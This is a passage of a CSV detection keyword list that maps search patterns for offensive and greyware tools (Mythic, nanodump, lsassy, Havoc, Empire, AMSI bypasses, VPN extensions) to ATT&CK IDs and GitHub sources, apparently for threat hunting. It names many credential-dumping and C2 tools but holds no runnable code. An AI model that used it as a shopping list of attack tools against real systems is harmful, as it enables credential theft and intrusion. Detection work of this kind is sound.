T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*MythicClient.cs*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*mythic-docker*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*MzHmO/DebugAmsi*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*MzHmO/Privileger*,offensive_tool_keyword,Privileger,Privileger is a tool to work with Windows Privileges,T1548.002,TA0004 ,N/A,N/A,Privilege Escalation,https://github.com/MzHmO/Privileger,1,1,N/A,8,2,117,25,2023-02-07T07:28:40Z,2023-01-31T11:24:37Z -*MzHmO/TGSThief*,offensive_tool_keyword,TGSThief,get the TGS of a user whose logon session is just present on the computer,T1558 - T1558.003 - T1078 - T1078.005,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/MzHmO/TGSThief,1,1,N/A,9,2,129,18,2023-07-25T05:30:39Z,2023-07-23T07:47:05Z -*n00py/LAPSDumper*,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,1,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z -*n00py/Slackor*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*n0de.exe*elevationstation*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*n1k7l4i/goMatrixC2*,offensive_tool_keyword,goMatrixC2,C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.,T1090 - T1027 - T1071,TA0011 - TA0009 - TA0010,N/A,N/A,C2,https://github.com/n1k7l4i/goMatrixC2,1,1,N/A,10,10,0,2,2023-09-11T10:20:41Z,2023-08-31T09:36:38Z -*n1k7l4i/goZulipC2*,offensive_tool_keyword,goZulipC2,C2 leveraging Zulip Messaging Platform as Backend.,T1090 - T1090.003 - T1071 - T1071.001,TA0011 - TA0009,N/A,N/A,C2,https://github.com/n1k7l4i/goZulipC2,1,1,N/A,10,10,5,2,2023-08-31T12:06:58Z,2023-08-13T11:04:20Z -*n1nj4sec*,offensive_tool_keyword,Github Username,Github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/n1nj4sec,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nabbmpekekjknlbkgpodfndbodhijjem*,greyware_tool_keyword,Earth VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*nac_bypass*,offensive_tool_keyword,nac_bypass,nac bypass - The basic requirement for an NAC bypass is access to a device that has already been authenticated. This device is used to log into the network and then smuggle in network packages from a different device. This involves placing the attackers system between the network switch and the authenticated device. One way to do this is with a Raspberry Pi and two network adapters,T1550.002 - T1078 - T1133 - T1040 - T1550,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Defense Evasion,https://github.com/scipag/nac_bypass,1,1,N/A,N/A,3,229,62,2023-08-02T09:09:19Z,2019-01-03T06:55:00Z -*nagios-root-privesc.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*--name chisel -p *,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*name=*Domain Admins*,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*named_pipes.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*NamedPipeImpersonation.cs*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*NamedPipeImpersonation.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*NamedPipeServer.ps1*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,0,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*namespace CredPhisher*,offensive_tool_keyword,CredPhisher,Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function,T1056.002 - T1111,TA0004 ,N/A,N/A,Phishing,https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*namespace RedPersist.Persist*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*namespace WheresMyImplant*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*namfblliamklmeodpcelkokjbffgmeoo*,greyware_tool_keyword,Daily VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*namp *--script *,offensive_tool_keyword,nmap,Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Network Exploitation tools,https://nmap.org/book/nse-usage.html,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nanodump *,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump -*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump.*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*nanodump.*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump.git*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump.x64*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump.x64.exe*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump.x86*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*nanodump_pipe*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*nanodump_ppl.x64.dll*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*nanodump_ppl_dump*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ppl_dump.x64*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ppl_dump.x86*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ppl_medic*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ppl_medic.x64*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ppl_medic.x86*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ssp*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*nanodump_ssp*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ssp.x64*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ssp.x64.dll*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*nanodump_ssp.x64.dll*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ssp.x86*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanodump_ssp_embedded.*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*NanoDumpChoose*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*nanodump-pipes*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*NanoDumpWriteDump*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*nanorobeus*_cs.x64.*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus*_cs.x86.*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus*dump*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus.cna*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*nanorobeus.x64*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus.x64.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*nanorobeus.x86*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus_brc4*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus64*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus86*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorobeus-main*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*nanorubeus.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*Narasimha1997/fake-sms*,offensive_tool_keyword,fake-sms,A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.,T1598.003 - T1514,TA0003 - TA0009,N/A,N/A,Defense Evasion,https://github.com/Narasimha1997/fake-sms,1,1,N/A,8,10,2513,167,2023-08-01T15:34:41Z,2021-02-18T15:18:50Z -*NativeEasyHook32.dll*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*NativeEasyHook64.dll*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*Naughty-Script.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*nbcojefnccbanplpoffopkoepjmhgdgh*,greyware_tool_keyword,Hoxx VPN Proxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*NBNSBruteForceHost*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*NBNSBruteForcePause*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*NBNSBruteForceSpoofer*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - 